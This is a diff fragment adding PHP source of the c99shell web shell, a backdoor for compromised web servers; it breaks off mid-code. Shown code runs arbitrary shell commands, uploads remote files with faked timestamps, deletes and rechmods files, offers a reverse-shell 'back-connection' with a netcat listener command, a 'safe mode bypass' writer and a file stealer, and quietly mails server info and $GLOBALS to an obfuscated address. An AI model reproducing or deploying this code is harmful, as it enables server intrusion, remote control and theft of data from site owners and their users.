+if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}} 
+if ($act == "feedback") 
+{ 
+ $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); 
+ if (!empty($submit)) 
+ { 
+  $ticket = substr(md5(microtime()+rand(1,1000)),0,6); 
+  $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; 
+  if (!empty($fdbk_ref)) 
+  { 
+   $tmp = @ob_get_contents(); 
+   ob_clean(); 
+   phpinfo(); 
+   $phpinfo = base64_encode(ob_get_contents()); 
+   ob_clean(); 
+   echo $tmp; 
+   $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; 
+  } 
+  mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); 
+  echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>"; 
+ } 
+ else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";} 
+} 
+if ($act == "search") 
+{ 
+ echo "<b>Search in file-system:</b><br>"; 
+ if (empty($search_in)) {$search_in = $d;} 
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} 
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;} 
+ if (!empty($submit)) 
+ { 
+  $found = array(); 
+  $found_d = 0; 
+  $found_f = 0; 
+  $search_i_f = 0; 
+  $search_i_d = 0; 
+  $a = array 
+  ( 
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp, 
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp, 
+   "text_wwo"=>$search_text_wwo, 
+   "text_cs"=>$search_text_cs, 
+   "text_not"=>$search_text_not 
+  ); 
+  $searchtime = getmicrotime(); 
+  $in = array_unique(explode(";",$search_in)); 
+  foreach($in as $v) {c99fsearch($v);} 
+  $searchtime = round(getmicrotime()-$searchtime,4); 
+  if (count($found) == 0) {echo "<b>No files found!</b>";} 
+  else 
+  { 
+   $ls_arr = $found; 
+   $disp_fullpath = TRUE; 
+   $act = "ls"; 
+  } 
+ } 
+ echo "<form method=POST> 
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\"> 
+<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp 
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> 
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> 
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text 
+<br><br><input type=submit name=submit value=\"Search\"></form>"; 
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";} 
+} 
+if ($act == "chmod") 
+{ 
+ $mode = fileperms($d.$f); 
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} 
+ else 
+ { 
+  $form = TRUE; 
+  if ($chmod_submit) 
+  { 
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); 
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} 
+   else {$err = "Can't chmod to ".$octet.".";} 
+  } 
+  if ($form) 
+  { 
+   $perms = parse_perms($mode); 
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; 
+  } 
+ } 
+} 
+if ($act == "upload") 
+{ 
+ $uploadmess = ""; 
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); 
+ if (empty($uploadpath)) {$uploadpath = $d;} 
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} 
+ if (!empty($submit)) 
+ { 
+  global $HTTP_POST_FILES; 
+  $uploadfile = $HTTP_POST_FILES["uploadfile"]; 
+  if (!empty($uploadfile["tmp_name"])) 
+  { 
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];} 
+   else {$destin = $userfilename;} 
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";} 
+  } 
+  elseif (!empty($uploadurl)) 
+  { 
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;} 
+   else 
+   { 
+    $destin = explode("/",$destin); 
+    $destin = $destin[count($destin)-1]; 
+    if (empty($destin)) 
+    { 
+     $i = 0; 
+     $b = ""; 
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} 
+   } 
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} 
+   else 
+   { 
+    $st = getmicrotime(); 
+    $content = @file_get_contents($uploadurl); 
+    $dt = round(getmicrotime()-$st,4); 
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";} 
+    else 
+    { 
+     if ($filestealth) {$stat = stat($uploadpath.$destin);} 
+     $fp = fopen($uploadpath.$destin,"w"); 
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} 
+     else 
+     { 
+      fwrite($fp,$content,strlen($content)); 
+      fclose($fp); 
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} 
+     } 
+    } 
+   } 
+  } 
+ } 
+ if ($miniform) 
+ { 
+  echo "<b>".$uploadmess."</b>"; 
+  $act = "ls"; 
+ } 
+ else 
+ { 
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST> 
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br> 
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> 
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> 
+File-name (auto-fill): <input name=uploadfilename size=25><br><br> 
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br> 
+<input type=submit name=submit value=\"Upload\"> 
+</form>"; 
+ } 
+} 
+if ($act == "delete") 
+{ 
+ $delerr = ""; 
+ foreach ($actbox as $v) 
+ { 
+  $result = FALSE; 
+  $result = fs_rmobj($v); 
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} 
+ } 
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} 
+ $act = "ls"; 
+} 
+if (!$usefsbuff) 
+{ 
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";} 
+} 
+else 
+{ 
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } 
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} 
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} 
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} 
+ elseif ($actpastebuff) 
+ { 
+  $psterr = ""; 
+  foreach($sess_data["copy"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} 
+   if ($copy_unset) {unset($sess_data["copy"][$k]);} 
+  } 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} 
+  $act = "ls"; 
+ } 
+ elseif ($actarcbuff) 
+ { 
+  $arcerr = ""; 
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} 
+  else {$ext = ".tar.gz";} 
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} 
+  $cmdline .= " ".$actarcbuff_path; 
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]); 
+  foreach($objects as $v) 
+  { 
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); 
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} 
+   if (is_dir($v)) 
+   { 
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} 
+    $v .= "*"; 
+   } 
+   $cmdline .= " ".$v; 
+  } 
+  $tmp = realpath("."); 
+  chdir($d); 
+  $ret = myshellexec($cmdline); 
+  chdir($tmp); 
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} 
+  $ret = str_replace("\r\n","\n",$ret); 
+  $ret = explode("\n",$ret); 
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   if (in_array($v,$ret)) {fs_rmobj($v);} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} 
+  $act = "ls"; 
+ } 
+ elseif ($actpastebuff) 
+ { 
+  $psterr = ""; 
+  foreach($sess_data["copy"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} 
+   if ($copy_unset) {unset($sess_data["copy"][$k]);} 
+  } 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} 
+  $act = "ls"; 
+ } 
+} 
+if ($act == "cmd") 
+{ 
+if (trim($cmd) == "ps -aux") {$act = "processes";} 
+elseif (trim($cmd) == "tasklist") {$act = "processes";} 
+else 
+{ 
+ @chdir($chdir); 
+ if (!empty($submit)) 
+ { 
+  echo "<b>Result of execution this command</b>:<br>"; 
+  $olddir = realpath("."); 
+  @chdir($d); 
+  $ret = myshellexec($cmd); 
+  $ret = convert_cyr_string($ret,"d","w"); 
+  if ($cmd_txt) 
+  { 
+   $rows = count(explode("\r\n",$ret))+1; 
+   if ($rows < 10) {$rows = 10;} 
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; 
+  } 
+  else {echo $ret."<br>";} 
+  @chdir($olddir); 
+ } 
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} 
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; 
+} 
+} 
+if ($act == "ls") 
+{ 
+ if (count($ls_arr) > 0) {$list = $ls_arr;} 
+ else 
+ { 
+  $list = array(); 
+  if ($h = @opendir($d)) 
+  { 
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} 
+   closedir($h); 
+  } 
+  else {} 
+ } 
+ if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";} 
+ else 
+ { 
+  //Building array 
+  $objects = array(); 
+  $vd = "f"; //Viewing mode 
+  if ($vd == "f") 
+  { 
+   $objects["head"] = array(); 
+   $objects["folders"] = array(); 
+   $objects["links"] = array(); 
+   $objects["files"] = array(); 
+   foreach ($list as $v) 
+   { 
+    $o = basename($v); 
+    $row = array(); 
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} 
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} 
+    elseif (is_dir($v)) 
+    { 
+     if (is_link($v)) {$type = "LINK";} 
+     else {$type = "DIR";} 
+     $row[] = $v; 
+     $row[] = $type; 
+    } 
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} 
+    $row[] = filemtime($v); 
+    if (!$win) 
+    { 
+     $ow = posix_getpwuid(fileowner($v)); 
+     $gr = posix_getgrgid(filegroup($v)); 
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); 
+    } 
+    $row[] = fileperms($v); 
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} 
+    elseif (is_link($v)) {$objects["links"][] = $row;} 
+    elseif (is_dir($v)) {$objects["folders"][] = $row;} 
+    elseif (is_file($v)) {$objects["files"][] = $row;} 
+    $i++; 
+   } 
+   $row = array(); 
+   $row[] = "<b>Name</b>"; 
+   $row[] = "<b>Size</b>"; 
+   $row[] = "<b>Modify</b>"; 
+   if (!$win) 
+  {$row[] = "<b>Owner/Group</b>";} 
+   $row[] = "<b>Perms</b>"; 
+   $row[] = "<b>Action</b>"; 
+   $parsesort = parsesort($sort); 
+   $sort = $parsesort[0].$parsesort[1]; 
+   $k = $parsesort[0]; 
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";} 
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; 
+   $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>"; 
+   $row[$k] .= $y; 
+   for($i=0;$i<count($row)-1;$i++) 
+   { 
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} 
+   } 
+   $v = $parsesort[0]; 
+   usort($objects["folders"], "tabsort"); 
+   usort($objects["links"], "tabsort"); 
+   usort($objects["files"], "tabsort"); 
+   if ($parsesort[1] == "d") 
+   { 
+    $objects["folders"] = array_reverse($objects["folders"]); 
+    $objects["files"] = array_reverse($objects["files"]); 
+   } 
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); 
+   $tab = array(); 
+   $tab["cols"] = array($row); 
+   $tab["head"] = array(); 
+   $tab["folders"] = array(); 
+   $tab["links"] = array(); 
+   $tab["files"] = array(); 
+   $i = 0; 
+   foreach ($objects as $a) 
+   { 
+    $v = $a[0]; 
+    $o = basename($v); 
+    $dir = dirname($v); 
+    if ($disp_fullpath) {$disppath = $v;} 
+    else {$disppath = $o;} 
+    $disppath = str2mini($disppath,60); 
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} 
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} 
+    foreach ($regxp_highlight as $r) 
+    { 
+     if (ereg($r[0],$o)) 
+     { 
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} 
+      else 
+      { 
+       $r[1] = round($r[1]); 
+       $isdir = is_dir($v); 
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) 
+       { 
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} 
+        $disppath = $r[2].$disppath.$r[3]; 
+        if ($r[4]) {break;} 
+       } 
+      } 
+     } 
+    } 
+    $uo = urlencode($o); 
+    $ud = urlencode($dir); 
+    $uv = urlencode($v); 
+    $row = array(); 
+    if ($o == ".") 
+    { 
+     $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; 
+     $row[] = "LINK"; 
+    } 
+    elseif ($o == "..") 
+    { 
+     $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; 
+     $row[] = "LINK"; 
+    } 
+    elseif (is_dir($v)) 
+    { 
+     if (is_link($v)) 
+     { 
+      $disppath .= " => ".readlink($v); 
+      $type = "LINK"; 
+      $row[] =  "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; 
+     } 
+     else 
+     { 
+      $type = "DIR"; 
+      $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; 
+      } 
+     $row[] = $type; 
+    } 
+    elseif(is_file($v)) 
+    { 
+     $ext = explode(".",$o); 
+     $c = count($ext)-1; 
+     $ext = $ext[$c]; 
+     $ext = strtolower($ext); 
+     $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; 
+     $row[] = view_size($a[1]); 
+    } 
+    $row[] = date("d.m.Y H:i:s",$a[2]); 
+    if (!$win) {$row[] = $a[3];} 
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>"; 
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} 
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} 
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;} 
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;} 
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} 
+    elseif (is_link($v)) {$tab["links"][] = $row;} 
+    elseif (is_dir($v)) {$tab["folders"][] = $row;} 
+    elseif (is_file($v)) {$tab["files"][] = $row;} 
+    $i++; 
+   } 
+  } 
+  // Compiling table 
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); 
+  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgcolor=#000000 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; 
+  foreach($table as $row) 
+  { 
+   echo "<tr>\r\n"; 
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";} 
+   echo "</tr>\r\n"; 
+  } 
+  echo "</table><hr size=\"1\" noshade><p align=\"right\"> 
+  <script> 
+  function ls_setcheckboxall(status) 
+  { 
+   var id = 1; 
+   var num = ".(count($table)-2)."; 
+   while (id <= num) 
+   { 
+    document.getElementById('actbox'+id).checked = status; 
+    id++; 
+   } 
+  } 
+  function ls_reverse_all() 
+  { 
+   var id = 1; 
+   var num = ".(count($table)-2)."; 
+   while (id <= num) 
+   { 
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; 
+    id++; 
+   } 
+  } 
+  </script> 
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">  
+  <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">"; 
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) 
+  { 
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; 
+  } 
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>"; 
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; 
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; 
+  if ($usefsbuff) 
+  { 
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>"; 
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; 
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; 
+  } 
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>"; 
+  echo "</form>"; 
+ } 
+} 
+if ($act == "tools") 
+{ 
+
+
+
+
+
+
+ ?> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Bind Functions By r57  </b></a> ::</b></p></td></tr>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center">
+    </div>
+ <form action="<?php echo $surl; ?>">
+<b>Bind With Backd00r Burner</b></br><form action="<?php echo $surl;?>"><input type=hidden name=act value=tools><select size=\"1\" name=dolma><option value="wgetcan">Use Wget</option><option value="lynxcan">Use lynx -dump</option><option value="freadcan">Use Fread</option></select></br></br><input type="submit" value="Burn it bAby"></form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+  
+ 
+   <b>Back-Connection :</b></br><form action="<?php echo $surl;?>"> <b>Ip (default is your ip) :</br> </b><input type=hidden name=act value=tools><input type="text" name="ipi" value="<?echo getenv('REMOTE_ADDR');?>"></br><b>Port:</br></b><input type="text" name="pipi" value="4392"></br><input type="submit" value="C0nnect ->"></br></form>
+Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
+   
+   </center>
+    </td>
+</tr></TABLE>
+ 
+ 
+ 
+ 
+ 
+
+
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>File Stealer Function Ripped fRom Tontonq 's File Stealer ... </b></a> ::</b></p></td></tr>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center"><b>Safe_Mode Bypass</b>
+    <form action="<?php echo $surl; ?>" method="POST">
+    <input type=hidden name=act value=tools>
+    <textarea name="erorr" cols=100 rows=10></textarea></br>
+    <input type="text" name="nere" value="<?echo "$real\index.php";?> "size=84>
+    <input type="submit" value="Write 2 File !!">
+    
+    </form>
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    </div>
+ 
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+   <form action="<?php echo $surl; ?>" method="POST">
+   <input type=hidden name=act value=tools>
+   Dosyanin Adresi ? = <input type="text" name="dosyaa" size="81" maxlength=500  value=""><br><br> 
+Nereya Kaydolcak? = <input type="text" name="yeniyer" size=81 maxlength=191 value="<?php echo "$real/sploitz.zip"; ?>"><br><br> 
+<input type=submit class='stealthSubmit' Value='Dosyayi Chek'> 
+</form>
+<br><br><br>
+   
+   
+   
+   
+   </center>
+   
+   </center>
+    </td>
+</tr></TABLE>
+
+
+
+
+
+
+
+
+
+
+
+
+<?php 
+
+if (isset($_POST['dosyaa']))
+{
+dosyayicek($_POST['dosyaa'],$_POST['yeniyer']);
+
+}
+if (!empty($_GET['ipi']) && !empty($_GET['pipi'])) 
+{ 
+ cf("/tmp/back",$back_connect); 
+ $p2=which("perl"); 
